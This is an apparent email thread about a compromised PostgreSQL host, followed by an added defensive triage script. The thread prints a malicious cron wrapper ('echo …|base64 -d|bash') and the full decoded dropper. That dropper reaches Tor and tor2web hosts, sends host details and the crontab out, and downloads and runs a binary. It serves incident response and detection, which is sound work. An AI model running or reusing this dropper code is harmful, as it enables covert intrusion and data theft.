Hey Antonis,
If you decode the Base64 below, you will see the following bash script, which is what it tries to execute on your machine:

x8C8W8llVk0Rzccy9N0ggCOI2VBAc
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")
sockz() {
n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)
p=$(echo "dns-query?name=relay.tor2socks.in")
q=${n[$((RANDOM%${#n[@]}))]}
s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
}
fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
02.01.2023, 11:37, "Antonis Christodoulou" <christan305@xxxxxxxxxxx>:
Hey Matthias, here it is:

christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh
#!/bin/bash
exec &>/dev/null
echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc
echo <base64 blob elided>|base64 -d|bash

On 2 Jan 2023, at 9:46 AM, Matthias Apitz <guru@xxxxxxxxxxx> wrote:

On Monday, January 02, 2023 at 08:53:32 a.m. +0200, Antonis Christodoulou wrote:
And for the record, Ahmet, here’s a weird cron job:
christan@vultr:~$ sudo crontab -l -u postgres
13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
Had no idea somebody could add something like this externally...
Please post the content of this script.
matthias
--
Matthias Apitz, ✉ guru@xxxxxxxxxxx, http://www.unixarea.de/ +49-176-38902045
Public GnuPG key: http://www.unixarea.de/key.pub
Good luck with your work
Best Regards
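The dropper and cron pattern discussed in this thread, as an added triage script that is not code from the thread or from any of its participants: it flags crontab entries that run a dotfile script or pipe base64 into a shell, pulls the blob out of an "echo <base64>|base64 -d|bash" wrapper and decodes it without executing anything, and counts indicator strings taken from the decoded script above (tor2web relays, .onion, the socks5h Tor proxy on port 9050, DoH dns-query lookups, the /tmp/.X11-unix/01 pidfile, checkip.amazonaws.com). The crontab dump and wrapper it scans are constructed stand-ins written to a temp directory, and the payload inside the constructed wrapper is a harmless sample that only reuses those strings; the IOC list and the dotfile-script heuristic are this example's own assumptions.

```shell
#!/bin/sh
# Triage helper for the pattern in this thread: a postgres cron entry that runs
# a hidden /var/lib/postgresql/.systemd-private-<id>.sh whose body is
# "echo <base64>|base64 -d|bash". Added example, not code from the thread.
# The IOC list is taken from the decoded script; the sample crontab and wrapper
# below are constructed here so the script runs offline.

# Strings present in the decoded payload: tor2web relays, .onion targets, the
# Tor SOCKS port, DoH lookups of relay.tor2socks.in, the pidfile it checks, and
# the external IP lookup. Assumed indicator set, extend as needed.
IOCS='tor2web\.|\.onion|socks5h://[^ ]*:9050|dns-query\?name=|/tmp/\.X11-unix/01|checkip\.amazonaws\.com'

# flag_cron_lines: crontab text on stdin; prints entries that run a dotfile
# script (e.g. /var/lib/postgresql/.systemd-private-*.sh) or that pipe base64
# into a shell. Exit status 0 when at least one entry was flagged.
flag_cron_lines() {
    grep -E '/\.[^/[:space:]]+\.sh([[:space:]]|$)|base64[[:space:]]+-d.*\|[[:space:]]*(ba)?sh'
}

# extract_payload FILE: take the base64 blob from an "echo X|base64 -d|bash"
# line and decode it to stdout. The decoded script is never run.
extract_payload() {
    sed -nE 's/^echo[[:space:]]+([A-Za-z0-9+\/=]{16,})[[:space:]]*\|[[:space:]]*base64[[:space:]]+-d[[:space:]]*\|[[:space:]]*(ba)?sh[[:space:]]*$/\1/p' "$1" \
        | base64 -d
}

# count_iocs FILE: number of decoded payload lines that match IOCS.
count_iocs() {
    extract_payload "$1" | grep -cE "$IOCS"
}

# build_sample DIR: write a constructed crontab dump and wrapper script into
# DIR (stand-ins, not the files from the thread) and print the wrapper path.
build_sample() {
    dir=$1
    printf '%s\n' \
        '0 3 * * * /usr/bin/vacuumdb --all' \
        '13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &' \
        > "$dir/crontab.txt"
    # Constructed, harmless stand-in for the decoded payload; it only reuses
    # the indicator strings so the IOC count has something to hit.
    payload='exec &>/dev/null
c="curl -4fsSLkA- -m200"
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status
for h in tor2web.in tor2web.it; do $c -x socks5h://127.0.0.1:9050 example.onion/int.x86_64; done'
    blob=$(printf '%s\n' "$payload" | base64 | tr -d '\n')
    wrapper="$dir/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh"
    printf '#!/bin/bash\nexec &>/dev/null\necho x8C8W8llVk0Rzccy9N0ggCOI2VBAc\necho %s|base64 -d|bash\n' "$blob" > "$wrapper"
    printf '%s\n' "$wrapper"
}

# Stand-alone run: build the sample in a temp dir, then report on it.
tmpdir=$(mktemp -d)
wrapper=$(build_sample "$tmpdir")
echo "== suspicious cron entries =="
flag_cron_lines < "$tmpdir/crontab.txt"
echo "== decoded payload from $wrapper (not executed) =="
extract_payload "$wrapper"
echo "== IOC line hits: $(count_iocs "$wrapper") =="
rm -rf "$tmpdir"
```

On a real host the same functions are used as `sudo crontab -l -u postgres | flag_cron_lines` and `extract_payload /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh`; the decoded text is only printed, never piped to a shell, which is the whole point of looking at it this way rather than letting cron do it.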